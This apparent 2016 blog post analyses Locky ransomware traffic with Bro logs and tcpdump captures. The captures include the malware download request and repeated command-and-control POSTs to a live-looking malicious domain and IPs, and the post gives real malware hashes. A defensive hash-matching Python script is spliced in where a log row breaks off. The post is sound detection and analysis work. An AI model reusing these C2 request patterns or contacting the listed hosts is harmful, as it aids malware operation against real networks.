BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis

By | July 1, 2016

(PCAP and Binary samples available with their usual password and location)

Bro and Snort are completely different types of applications, although they are commonly compared against one another. From a network security standpoint Snort can’t do much to detect new malware variants, obfuscation TTPs and the other non-low-hanging fruit we haven’t yet written a signature for.

Bro gives us the ability to detect malware as close to 0day as we could hope for, with a few simple tricks. Once you have enabled all Bro logging options you will have SHA1 and MD5 hashes for the files and certificates traversing your network. Bro by itself is nothing more than a logging interface, but it can easily be turned into an IDS. Anti-virus software depends upon signatures, heuristics and patterns that have been fed to it for detection; this type of detection is far from real time, but for most of us it is as good as it gets.

When I submitted the Locky ransomware sample here “https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/” for scanning it had a detection rate of 4/50 (by now most of the AV suites are detecting it), with only Trend Micro AV actually detecting it as Locky. We can use Bro as an enhanced anti-virus suite by leveraging all of the major software providers’ intel at once. File samples are submitted all over the Internet at different rates and to different vendors, and almost all vendors have RSS feeds and Google search console updates almost instantly. If we create a simple Python script to cURL all of the major vendors’ feeds and index the file hashes and indicators of compromise, we can essentially leverage the collective knowledge of all of the major vendors without a paid subscription to any. Create a cronjob to search for the latest entries every 5, 10, 30 or 60 minutes, or whatever suits your client’s or site’s needs, and match them against the hashes, IPs and domain names traversing your network.

Here are sample Bro logs of the Locky malware:

https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/
SHA256:    84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5

root@computersecurity:/var/log/bro/2016-06-28# zcat files.17\:00\:00-18\:00\:00.log.gz | grep application/x-dos
1467148303.427135       FEQjwH1zOtgq0XUwd       217.74.66.167   192.168.1.100 ChxVZM3W6tGn0jM9ad      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.334915        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05        –       –

https://malwr.com/analysis/NTIwNjc0Zjc1NWJlNDUwOTg5NTA2OWQ3ZTZkZmFkZWQ/

1467148303.428111       F3ZsZV32sDWqH6jLFj      217.74.66.167   192.168.1.100   CDKmDc28png4js7QY1      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.338627        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05        –       –

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ASMW/detailed-analysis.aspx#

root@computersecurity:/var/log/bro/2016-06-28# zcat http.17\:00\:00-18\:00\:00.log.gz | grep 217.74.66.167
1467148303.427135       ChxVZM3W6tGn0jM9ad      192.168.1.100  39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – FEQjwH1zOtgq0XUwd        application/x-dosexec
1467148303.428111       CDKmDc28png4js7QY1      192.168.1.100   39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – F3ZsZV32sDWqH6jLFj       application/x-dosexec

root@computersecurity:/var/log/bro/2016-06-28# zcat pe.17\:00\:00-18\:00\:00.log.gz
#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    –
#path   pe
#open   2016-06-28-17-11-45
#fields ts      id      machine compile_ts      os      subsystem       is_exe  is_64bit        uses_aslr       uses_dep        uses_code_integrity     uses_seh        has_import_table        has_export_table        has_cert_table  has_debug_data     section_names
#types  time    string  string  time    string  string  bool    bool    bool    bool    bool    bool    bool    bool    bool    bool    vector[string]
1467148303.427546       FEQjwH1zOtgq0XUwd       I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
1467148303.429271       F3ZsZV32sDWqH6jLFj      I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
#close  2016-06-28-18-00-00

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.17\:00\:00-18\:00\:00.log.gz | grep 217.74
1467148303.153851       CAGAOC2ltPBR0uP1fj      192.168.1.100   48407   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F
1467148303.153406       CC6Pi1y2ccItuEWSd       192.168.1.100 53627   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F

Callback Traffic:

root@computersecurity:/var/log/bro/2016-06-28# zcat conn.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152337.859581 CdsNLi2wzTqFogbC75 192.168.1.100 57436 151.236.15.226 80 tcp http 4.752286 5249 0 S0 T F 0 SAD 14 5821 0 0 (empty)
1467152337.963955 Cib4i04qmEJujDylCf 192.168.1.100 57436 151.236.15.226 80 tcp – 284.882985 0 12631 SHR T F 0 hadf 0 0 28 13763 (empty)
1467152357.463053 CPlEdm3dmsVSNedE32 192.168.1.100 57436 151.236.15.226 80 tcp – 265.384630 3913 0 OTH T F 0 DA 10 4313 0 0 (empty)
1467153134.228094 Cpm6U13YlnzxKjNtmh 192.168.1.100 57436 151.236.15.226 80 tcp – – – – SH T F 0 F 1 40 0 0 (empty)
1467153134.328506 Cp7e6NpP3PwGqcmZb 192.168.1.100 57436 151.236.15.226 80 tcp – – – – RSTRH T F 0 r 0 0 1 40 (empty)
1467153638.321168 CL8b5C1mJEASLDOHA2 192.168.1.100 58128 151.236.15.226 80 tcp http 2.884468 3615 0 S0 T F 0 SAD 12 4107 0 0 (empty)
1467153643.383005 CT8caj2DDA5gKnacu1 192.168.1.100 58128 151.236.15.226 80 tcp – 82.386675 9170 0 SH T F 0 DAF 20 9970 0 0 (empty)
1467153638.425665 Cyb5P42KRdZGCumUk3 192.168.1.100 58128 151.236.15.226 80 tcp – 87.343249 0 12321 SHR T F 0 hadf 0 0 35 13733 (empty)

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.18\:00\:00-19\:00\:00.log.gz | grep .biz
1467152335.499772 CkcKxg3Vgocx5ZP7Jj 192.168.1.100 55462 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152336.511728 C4Y4s5z3hBIdCnoe9 192.168.1.100 55463 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505404 CvpNyI34kpJnmHYJ6e 192.168.1.100 55462 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.505803 CjkpHg1Wv2ApzPn2D1 192.168.1.100 55464 75.75.75.75 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152337.857609 C3u42t4W5TL1Nojhsd 192.168.1.100 24552 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152338.505541 Co5Hqy1qM8cU8rcph 192.168.1.100 55463 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F
1467152338.843204 Ccl0T84oBNlsGJcE6c 192.168.1.100 50262 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz – – – – 0 NOERROR F F F T 0 151.236.15.226 600.000000 F
1467152339.507084 CVEg303R9VQw6MigZk 192.168.1.100 55464 75.75.76.76 53 udp 18771 wjfkoqueatxdmqw.biz 1 C_INTERNET 1 A – – F F T F 0 – F

root@computersecurity:/var/log/bro/2016-06-28# zcat files.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152338.072969       FUEGOP2CN9E2bA2xIf      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1126    1126    0       0       F       – 873420329f0835e13de6b696e31353e8 f933bcc846985318b2b574801e442ab98494b14b        –       –
1467152338.467968       FJQWHF1BLLIO3la3p1      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       313     313     0       0       F       –       2986b2044d6bb6a5dafb4e2966c26d1a   9f6a15adf63c7c2b1ae5bbaa627742db86fceade        –       –
1467152338.581431       F4FVGV3dQLX8tHAir6      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       790     790     0       0       F       – 9697ae3ef8f8f7ce2c6c70c69690ff16 26b0b1cbc1be7361db78b125bd2a9df05b5b7df1        –       –
1467152338.966439       FFqoA33xdIAhANt7nd      151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.000000        F       F       1195    1195    0       0       F       –       f7d46ab6b7754b656669da1046c77e30   8058dabfe112e1d84458170c01292423f3f8aa2b        –       –
1467152338.968820       F3vIQz1MXORQkl871i      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       490     490     0       0       F       – 2bf68f81591033199bdb28b2bd7aadc8 ad28c783a43dfa1594d44d1a96d4482248a9d113        –       –
1467152339.368526       FY1BJMa0OBilCocI1       151.236.15.226  192.168.1.100  Cib4i04qmEJujDylCf      HTTP    0       SHA1,MD5        –       –       0.070727        F       F       9491    9491    0       0       F       –       26931832cc92296c9c037803530da456   a0bf3aea40193ab452745675b24eeb96c78e6477        –       –
1467152342.155877       FeOxTb4AK7XOgpZ3B4      192.168.1.100   151.236.15.226  CdsNLi2wzTqFogbC75      HTTP    0       SHA1,MD5        text/plain      –       0.000000        T       T       1201    1201
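One way to implement the feed-indexing and hash-matching step described above, as an added example rather than the post's own script: it parses a Bro files.log by its own #fields header, pulls every MD5/SHA1/SHA256 token out of fetched vendor feed text, and also flags application/x-dosexec downloads from hosts that are not on a whitelist. The files.log header, the third log row, the feed text and the whitelist host are constructed for the example; the first two rows carry the hashes shown in the logs on this page.

```python
import re

# Any 32-, 40- or 64-hex token in fetched feed text (RSS, HTML, plain lists).
HASH_RE = re.compile(r"\b[0-9a-fA-F]{32}\b|\b[0-9a-fA-F]{40}\b|\b[0-9a-fA-F]{64}\b")

# Constructed vendor feed snippet: the SHA256 from the VirusTotal link above and
# the MD5 from files.log, in upper case to show the lookup is case-insensitive.
VENDOR_FEED = """<item><title>Ransom.Locky</title>
<description>SHA256: 84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5
MD5: BEF0781693C41BCDA3000C8F5CA40E3E</description></item>"""

# Constructed files.log: assumed Bro 2.x #fields header, the two rows seen on this
# page, plus a constructed PE download from an unlisted host (203.0.113.10).
FILES_LOG = "\n".join("\t".join(line.split()) for line in """
#fields ts fuid tx_hosts rx_hosts conn_uids source depth analyzers mime_type filename duration local_orig is_orig seen_bytes total_bytes missing_bytes overflow_bytes timedout parent_fuid md5 sha1 sha256 extracted
1467148303.427135 FEQjwH1zOtgq0XUwd 217.74.66.167 192.168.1.100 ChxVZM3W6tGn0jM9ad HTTP 0 PE,SHA1,MD5 application/x-dosexec - 1.334915 F F 269106 269106 0 0 F - bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05 - -
1467152338.072969 FUEGOP2CN9E2bA2xIf 192.168.1.100 151.236.15.226 CdsNLi2wzTqFogbC75 HTTP 0 SHA1,MD5 text/plain - 0.000000 T T 1126 1126 0 0 F - 873420329f0835e13de6b696e31353e8 f933bcc846985318b2b574801e442ab98494b14b - -
1467152400.000000 FCONSTRUCTED1 203.0.113.10 192.168.1.100 CCONSTRUCTED1 HTTP 0 PE,SHA1,MD5 application/x-dosexec - 0.500000 F F 1024 1024 0 0 F - 00112233445566778899aabbccddeeff 00112233445566778899aabbccddeeff00112233 - -
""".strip().splitlines())


def load_indicators(feed_text):
    """Index every hash-looking token from feed text into one lowercase set."""
    return {h.lower() for h in HASH_RE.findall(feed_text)}


def parse_bro_log(text):
    """Parse a Bro TSV log into dicts keyed by the names in its #fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def match_files(rows, indicators, allowed_exe_sources=frozenset()):
    """Return (fuid, reason, tx_host) for rows with a known-bad hash, or for a
    PE download whose sending host is not on the whitelist."""
    alerts = []
    for r in rows:
        hit = [r[k] for k in ("md5", "sha1", "sha256") if r.get(k, "-") in indicators]
        if hit:
            alerts.append((r["fuid"], "hash on vendor feed: " + hit[0], r["tx_hosts"]))
        elif r.get("mime_type") == "application/x-dosexec" and r["tx_hosts"] not in allowed_exe_sources:
            alerts.append((r["fuid"], "PE download from unlisted host", r["tx_hosts"]))
    return alerts


def scan(files_log=FILES_LOG, feed=VENDOR_FEED, allowed=frozenset({"10.10.10.10"})):
    """Run the cron-style check: index the feed, then match the rotated files.log."""
    return match_files(parse_bro_log(files_log), load_indicators(feed), allowed)


if __name__ == "__main__":
    for fuid, reason, host in scan():
        print(fuid, reason, host)
```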


If you are creating Snort rules in a very paranoid manner you may have detected the payload request or the POST requests without a referrer. Creating Snort rules based on URI content is a frivolous endeavor, as almost all crimeware groups these days use hacked infrastructure to host their malicious content. If you think a POST request to /wp-content// is a reliable indicator, you have much to learn. These kiddies are Google dorking the latest stored XSS and SQLi to upload their package; there is nothing fixed about this location. If your client base is small enough it would be smart to create rules that alert on binary downloads and on POST requests without referrers, using a whitelist-based method. Detecting the type of traffic below as malicious will become axiomatic.

E..c66…..r…kh.T….P’..@.U.DP…1…GET /images/samples/locky.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2016-06-28 18:18:57.969089 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 2729606803, win 256, length 0
E..(\…..t….k…..\.Pl…..~.P….7……..
2016-06-28 18:18:57.969599 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 0:411, ack 1, win 256, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sO…k…..\.Pl…..~.P…”…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1126
Connection: Keep-Alive
2016-06-28 18:18:58.072969 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 411:1537, ack 1, win 256, length 1126: HTTP
2016-06-28 18:18:58.470622 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1537:1947, ack 470, win 254, length 410: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sN…k…..\.Pl……hP…h…POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 790
Connection: Keep-Alive
2016-06-28 18:18:58.581431 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 1947:2737, ack 470, win 254, length 790: HTTP
2016-06-28 18:18:58.968820 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 2737:3637, ack 1822, win 256, length 900: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..qb…k…..\.Pl…….P…p!..POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 490
Connection: Keep-Alive

2016-06-28 18:18:59.369955 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 4742, win 256, length 0
E..(\ ….t….k…..\.Pl../….P….}……..
2016-06-28 18:18:59.371198 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 7401, win 256, length 0
E..(\….t….k…..\.Pl../…{P………….

2016-06-28 18:19:02.054922 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 3637:4048, ack 11470, win 251, length 411: HTTP: POST /upload/_dispatch.php HTTP/1.1
E…\…..sF…k…..\.Pl../…`P…….POST /upload/_dispatch.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://wjfkoqueatxdmqw.biz/upload/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wjfkoqueatxdmqw.biz
Content-Length: 1201
Connection: Keep-Alive
2016-06-28 18:19:02.155877 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [P.], seq 4048:5249, ack 11470, win 251, length 1201: HTTP
2016-06-28 18:19:02.611867 IP 192.168.1.107.57436 > 151.236.15.226.80: Flags [.], ack 11881, win 256, length 0
E..(\…..t….k…..\.Pl.#{….P….N……..
